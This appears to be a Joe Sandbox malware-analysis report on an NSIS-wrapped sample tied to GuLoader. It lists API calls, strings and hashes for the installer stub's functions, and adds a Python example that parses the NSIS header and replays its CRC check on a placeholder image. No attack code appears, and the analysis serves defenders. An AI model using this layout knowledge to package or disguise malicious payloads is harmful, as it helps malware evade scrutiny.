                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                            • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406266
                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                          • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$&B
                                                          • API String ID: 2246997448-2586977930
                                                          • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                          • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                          • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,00437800,?), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNEL32(?,00409230), ref: 00402F7C
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                          • Null, xrefs: 00402EB5
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                          • Inst, xrefs: 00402EA3
                                                          • Error launching installer, xrefs: 00402E0C
                                                          • soft, xrefs: 00402EAC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-787788815
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
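The function above opens its own image (GetModuleFileNameW, GetFileSize), references the fragments "Null", "soft" and "Inst", and can fail with "Error launching installer" or "Installer integrity check has failed": that is the NSIS (Nullsoft Scriptable Install System) stub locating its data block by the "NullsoftInst" signature and validating it, which is worth recognising so that analyst time goes to the GuLoader payload rather than to installer boilerplate. The example below is added for this page and is not code from the report or from NSIS. It uses the firstheader layout from NSIS's fileform.h and replays the stub's decisions on an in-memory image; the image it builds is a constructed stand-in (a 512-byte placeholder instead of a real PE stub), and the choice to compute the CRC over the whole image up to the trailing CRC field is stated as this example's assumption.

```python
import struct
import zlib

# NSIS 'firstheader' constants (from NSIS fileform.h). The stub compares the
# 12-byte signature as three ints, which is why the report shows the string
# fragments "Null", "soft" and "Inst" separately.
FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"
FH_FLAGS_UNINSTALL, FH_FLAGS_SILENT, FH_FLAGS_NO_CRC, FH_FLAGS_FORCE_CRC = 1, 2, 4, 8
FH_FLAGS_MASK = 0x0F
# struct firstheader { int flags; int siginfo; int nsinst[3];
#                      int length_of_header; int length_of_all_following_data; }
FIRSTHEADER = struct.Struct("<II12sII")
FH_SIZE = FIRSTHEADER.size  # 28 bytes


def find_firstheader(data: bytes) -> int:
    """Offset of the firstheader in the image, or -1 if none is found."""
    pattern = struct.pack("<I", FH_SIG) + FH_MAGIC   # siginfo + nsinst[3]
    pos = 0
    while True:
        idx = data.find(pattern, pos)
        if idx < 0:
            return -1
        if idx >= 4:                                  # room for the flags word in front
            flags = struct.unpack_from("<I", data, idx - 4)[0]
            if flags & ~FH_FLAGS_MASK == 0:           # undefined flag bits must be clear
                return idx - 4
        pos = idx + 1


def check_installer(data: bytes, ncrc_switch: bool = False) -> dict:
    """Replay the stub's load/verify decisions on an in-memory image.

    Returns a dict instead of raising the 'Installer integrity check has
    failed' dialog. `ncrc_switch` models the /NCRC command-line option, which
    the stub honours unless the image was built with FH_FLAGS_FORCE_CRC.
    """
    off = find_firstheader(data)
    if off < 0:
        return {"status": "not-nsis"}
    flags, _sig, _magic, header_len, data_len = FIRSTHEADER.unpack_from(data, off)
    result = {"status": "ok", "offset": off, "flags": flags,
              "header_len": header_len, "data_len": data_len, "crc_checked": False}
    end = off + data_len   # length_of_all_following_data counts the firstheader and CRC
    if data_len < FH_SIZE or end > len(data):
        result["status"] = "integrity-failed"        # typical of a truncated download
        return result
    skip_crc = bool(flags & FH_FLAGS_NO_CRC) or (ncrc_switch and not flags & FH_FLAGS_FORCE_CRC)
    if not skip_crc:
        result["crc_checked"] = True
        stored = struct.unpack_from("<I", data, end - 4)[0]
        # Assumption of this example: the CRC covers the whole image from byte 0
        # up to (not including) the trailing 4-byte CRC field.
        computed = zlib.crc32(data[:end - 4]) & 0xFFFFFFFF
        if stored != computed:
            result["status"] = "integrity-failed"
    return result


def build_image(payload: bytes, flags: int = 0) -> bytes:
    """Constructed test image: a 512-byte placeholder in place of the PE stub,
    then firstheader + payload (+ CRC unless FH_FLAGS_NO_CRC). Not a real PE;
    length_of_header is set to the payload length as a stand-in value."""
    stub = b"MZ" + b"\x00" * 510
    crc_len = 0 if flags & FH_FLAGS_NO_CRC else 4
    data_len = FH_SIZE + len(payload) + crc_len
    fh = FIRSTHEADER.pack(flags, FH_SIG, FH_MAGIC, len(payload), data_len)
    image = stub + fh + payload
    if crc_len:
        image += struct.pack("<I", zlib.crc32(image) & 0xFFFFFFFF)
    return image


if __name__ == "__main__":
    img = build_image(b"<compressed header + datablock>")
    print("intact   :", check_installer(img))
    print("truncated:", check_installer(img[:-8]))
    damaged = bytearray(img)
    damaged[512 + FH_SIZE] ^= 0xFF                   # flip one payload byte
    print("corrupted:", check_installer(bytes(damaged)))
```

On a real sample, `find_firstheader` run over the file bytes gives the offset of the NSIS data block; everything before it is the generic stub whose functions fill this section of the report, and everything after it is what carries the actual payload.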
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(004271A0,?), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(004271A0,?), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-730719616
                                                          • Opcode ID: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: e03ee4e1462f3c7bda9b94e6fe8d7db5edd62b66dd87b3b0d45524ad71c1dce3
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                          • GetSysColor.USER32(00000000), ref: 0040423A
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                          • SetBkMode.GDI32(?,?), ref: 00404252
                                                          • GetSysColor.USER32(?), ref: 00404265
                                                          • SetBkColor.GDI32(?,?), ref: 00404275
                                                          • DeleteObject.GDI32(?), ref: 0040428F
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                          • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402616
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402639
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040264F
                                                            • Part of subcall function 00405C37: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                          • String ID: 9
                                                          • API String ID: 1149667376-2366072709
                                                          • Opcode ID: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                          • Opcode Fuzzy Hash: 13182ff9c3515e99dde9a7f361e17df10afd981257497e4f41ca39f28698b78d
                                                          • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69
                                                          APIs
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                          • CloseHandle.KERNEL32(?), ref: 0040288F
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                          • GlobalFree.KERNEL32(?), ref: 0040285E
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                            • Part of subcall function 00403062: SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                            • Part of subcall function 00403062: WriteFile.KERNEL32(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,?,00000000,00000000,?,?), ref: 00403115
                                                          • DeleteFileW.KERNEL32(?), ref: 004028A3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
                                                          • Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
                                                          • Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9
                                                          APIs
                                                          • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                          • Opcode Fuzzy Hash: 3b277214ccb200348dce810b6065f154b0d7733336d6f52acf236ebd4cfd95e9
                                                          • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8
                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                          • GetTickCount.KERNEL32 ref: 00402D53
                                                          • wsprintfW.USER32 ref: 00402D81
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                            • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,?,?), ref: 00402D13
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                          • Opcode Fuzzy Hash: ecca89fa2e5f998eed3815419d4b4a2aa167a0d5ca2c6de3075ca18f1a733700
                                                          • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                          • GetMessagePos.USER32 ref: 00404ADF
                                                          • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                          • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                          • wsprintfW.USER32 ref: 00402CD1
                                                          • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 1451636040-1158693248
                                                          • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                          • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                          • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                          APIs
                                                          • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                          • wsprintfW.USER32 ref: 00404A70
                                                          • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$&B
                                                          • API String ID: 3540041739-2907463167
                                                          • Opcode ID: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                          • Opcode Fuzzy Hash: 8753f46c6ec8b6f380e8412305eac44d84582c9e4d7b05b47d8315f57e295f46
                                                          • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 0040623F
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                          • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406253
                                                          • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406266
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                          • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                          • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 0040252F
                                                          • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,?,?,?,00000021), ref: 00402536
                                                          • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.2751058770.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.2751038431.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751193490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751232298.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000002.00000002.2751286933.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
